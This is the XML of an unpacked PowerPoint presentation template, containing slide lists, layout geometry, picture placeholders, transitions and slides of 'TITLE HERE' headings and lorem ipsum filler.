
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="png" ContentType="image/png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332" r:id="rId3"/>
    <p:sldId id="333" r:id="rId5"/>
    <p:sldId id="334" r:id="rId6"/>
    <p:sldId id="356" r:id="rId7"/>
    <p:sldId id="375" r:id="rId8"/>
    <p:sldId id="376" r:id="rId9"/>
    <p:sldId id="409" r:id="rId10"/>
    <p:sldId id="377" r:id="rId11"/>
    <p:sldId id="387" r:id="rId12"/>
    <p:sldId id="381" r:id="rId13"/>
    <p:sldId id="388" r:id="rId14"/>
    <p:sldId id="382" r:id="rId15"/>
    <p:sldId id="384" r:id="rId16"/>
    <p:sldId id="385" r:id="rId17"/>
    <p:sldId id="383" r:id="rId18"/>
    <p:sldId id="379" r:id="rId19"/>
    <p:sldId id="378" r:id="rId20"/>
    <p:sldId id="335" r:id="rId21"/>
    <p:sldId id="374" r:id="rId22"/>
    <p:sldId id="373" r:id="rId23"/>
    <p:sldId id="392" r:id="rId24"/>
    <p:sldId id="390" r:id="rId25"/>
    <p:sldId id="391" r:id="rId26"/>
    <p:sldId id="389" r:id="rId27"/>
    <p:sldId id="393" r:id="rId28"/>
    <p:sldId id="394" r:id="rId29"/>
    <p:sldId id="397" r:id="rId30"/>
    <p:sldId id="396" r:id="rId31"/>
    <p:sldId id="395" r:id="rId32"/>
    <p:sldId id="398" r:id="rId33"/>
    <p:sldId id="399" r:id="rId34"/>
    <p:sldId id="400" r:id="rId35"/>
    <p:sldId id="401" r:id="rId36"/>
    <p:sldId id="402" r:id="rId37"/>
    <p:sldId id="403" r:id="rId38"/>
    <p:sldId id="308" r:id="rId39"/>
    <p:sldId id="405" r:id="rId40"/>
    <p:sldId id="336" r:id="rId41"/>
    <p:sldId id="309" r:id="rId42"/>
    <p:sldId id="412" r:id="rId43"/>
    <p:sldId id="413" r:id="rId44"/>
    <p:sldId id="414" r:id="rId45"/>
    <p:sldId id="415" r:id="rId46"/>
    <p:sldId id="416" r:id="rId47"/>
    <p:sldId id="338" r:id="rId48"/>
    <p:sldId id="411" r:id="rId49"/>
    <p:sldId id="410" r:id="rId5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20A23"/>
    <a:srgbClr val="124062"/>
    <a:srgbClr val="537285"/>
    <a:srgbClr val="FEFEFE"/>
    <a:srgbClr val="F6F6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262" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="46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1398"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="3978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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps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F5CAC1-9625-4378-942F-06327CAF8CD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9532B1-D51B-4065-979B-CDD6B40756D2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06E986-C308-4ACB-A553-7C4143ED60A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532B1-D51B-4065-979B-CDD6B40756D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532B1-D51B-4065-979B-CDD6B40756D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532B1-D51B-4065-979B-CDD6B40756D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532B1-D51B-4065-979B-CDD6B40756D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06E986-C308-4ACB-A553-7C4143ED60A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532B1-D51B-4065-979B-CDD6B40756D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532B1-D51B-4065-979B-CDD6B40756D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06E986-C308-4ACB-A553-7C4143ED60A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54CB16-7291-478B-BA08-B58146A058D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54CB16-7291-478B-BA08-B58146A058D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54CB16-7291-478B-BA08-B58146A058D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532B1-D51B-4065-979B-CDD6B40756D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54CB16-7291-478B-BA08-B58146A058D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532B1-D51B-4065-979B-CDD6B40756D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532B1-D51B-4065-979B-CDD6B40756D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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B7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图片 6" descr="微信图片_201806281745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510" y="-180975"/>
            <a:ext cx="1837690" cy="18376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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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矩形 5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 descr="微信图片_201806281745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510" y="-180975"/>
            <a:ext cx="1837690" cy="1837690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接连接符 23" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1377951" y="2069043"/>
            <a:ext cx="2981325" cy="1754717"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4471988"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2632075"/>
              <a:gd name="connsiteX1" fmla="*/ 4471988 w 4471988"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2632075"/>
              <a:gd name="connsiteX2" fmla="*/ 4471988 w 4471988"/>
              <a:gd name="connsiteY2" fmla="*/ 2632075 h 2632075"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4471988"/>
              <a:gd name="connsiteY3" fmla="*/ 2632075 h 2632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1988" h="2632075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4471988" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4471988" y="2632075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2632075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1665">
                <a:solidFill>
                  <a:schemeClr val="bg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marR="0" lvl="0" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604809" y="2069043"/>
            <a:ext cx="2981325" cy="1754717"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4471988"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2632075"/>
              <a:gd name="connsiteX1" fmla="*/ 4471988 w 4471988"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2632075"/>
              <a:gd name="connsiteX2" fmla="*/ 4471988 w 4471988"/>
              <a:gd name="connsiteY2" fmla="*/ 2632075 h 2632075"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4471988"/>
              <a:gd name="connsiteY3" fmla="*/ 2632075 h 2632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1988" h="2632075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4471988" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4471988" y="2632075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2632075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1665">
                <a:solidFill>
                  <a:schemeClr val="bg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marR="0" lvl="0" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Picture Placeholder 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7831667" y="2069043"/>
            <a:ext cx="2981325" cy="1754717"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4471988"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2632075"/>
              <a:gd name="connsiteX1" fmla="*/ 4471988 w 4471988"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2632075"/>
              <a:gd name="connsiteX2" fmla="*/ 4471988 w 4471988"/>
              <a:gd name="connsiteY2" fmla="*/ 2632075 h 2632075"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4471988"/>
              <a:gd name="connsiteY3" fmla="*/ 2632075 h 2632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1988" h="2632075">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4471988" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4471988" y="2632075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2632075"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr lang="en-US" sz="1665">
                <a:solidFill>
                  <a:schemeClr val="bg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marR="0" lvl="0" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr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 advTm="3000">
        <p14:warp dir="in"/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="slow" advTm="3000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ir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4064000" y="441961"/>
            <a:ext cx="4368800" cy="3083564"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3276600" h="3124200">
                <a:moveTo>
                  <a:pt x="3028950" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3165723" y="0"/>
                  <a:pt x="3276600" y="110877"/>
                  <a:pt x="3276600" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3276600" y="2876550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3276600" y="3013323"/>
                  <a:pt x="3165723" y="3124200"/>
                  <a:pt x="3028950" y="3124200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2892177" y="3124200"/>
                  <a:pt x="2781300" y="3013323"/>
                  <a:pt x="2781300" y="2876550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2781300" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2781300" y="110877"/>
                  <a:pt x="2892177" y="0"/>
                  <a:pt x="3028950" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2317750" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2454523" y="0"/>
                  <a:pt x="2565400" y="110877"/>
                  <a:pt x="2565400" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2565400" y="2876550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2565400" y="3013323"/>
                  <a:pt x="2454523" y="3124200"/>
                  <a:pt x="2317750" y="3124200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2180977" y="3124200"/>
                  <a:pt x="2070100" y="3013323"/>
                  <a:pt x="2070100" y="2876550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2070100" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2070100" y="110877"/>
                  <a:pt x="2180977" y="0"/>
                  <a:pt x="2317750" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1606550" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1743323" y="0"/>
                  <a:pt x="1854200" y="110877"/>
                  <a:pt x="1854200" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1854200" y="2876550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1854200" y="3013323"/>
                  <a:pt x="1743323" y="3124200"/>
                  <a:pt x="1606550" y="3124200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1469777" y="3124200"/>
                  <a:pt x="1358900" y="3013323"/>
                  <a:pt x="1358900" y="2876550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1358900" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1358900" y="110877"/>
                  <a:pt x="1469777" y="0"/>
                  <a:pt x="1606550" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="958850" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1095623" y="0"/>
                  <a:pt x="1206500" y="110877"/>
                  <a:pt x="1206500" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1206500" y="2876550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1206500" y="3013323"/>
                  <a:pt x="1095623" y="3124200"/>
                  <a:pt x="958850" y="3124200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="822077" y="3124200"/>
                  <a:pt x="711200" y="3013323"/>
                  <a:pt x="711200" y="2876550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="711200" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="711200" y="110877"/>
                  <a:pt x="822077" y="0"/>
                  <a:pt x="958850" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="247650" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="384423" y="0"/>
                  <a:pt x="495300" y="110877"/>
                  <a:pt x="495300" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="495300" y="2876550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="495300" y="3013323"/>
                  <a:pt x="384423" y="3124200"/>
                  <a:pt x="247650" y="3124200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110877" y="3124200"/>
                  <a:pt x="0" y="3013323"/>
                  <a:pt x="0" y="2876550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="110877"/>
                  <a:pt x="110877" y="0"/>
                  <a:pt x="247650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954706" y="3801452"/>
            <a:ext cx="4511964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200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Hairline"/>
                <a:cs typeface="Lato Hairline"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>TITLE HERE</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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954706" y="4385250"/>
            <a:ext cx="4511964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Ultimate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Powerpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Template</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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3975167" y="4817825"/>
            <a:ext cx="4488039" cy="153686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44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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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000">
        <p:fade/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback>
      <p:transition spd="med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4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with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0" y="1533748"/>
            <a:ext cx="12192000" cy="3708812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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591963" y="5539546"/>
            <a:ext cx="10691989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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fringilla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cursus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aenean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>accumsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malesuada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hendrerit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Morbi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>amet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> dolor ante. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Duis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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viverra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ultricies</a:t>
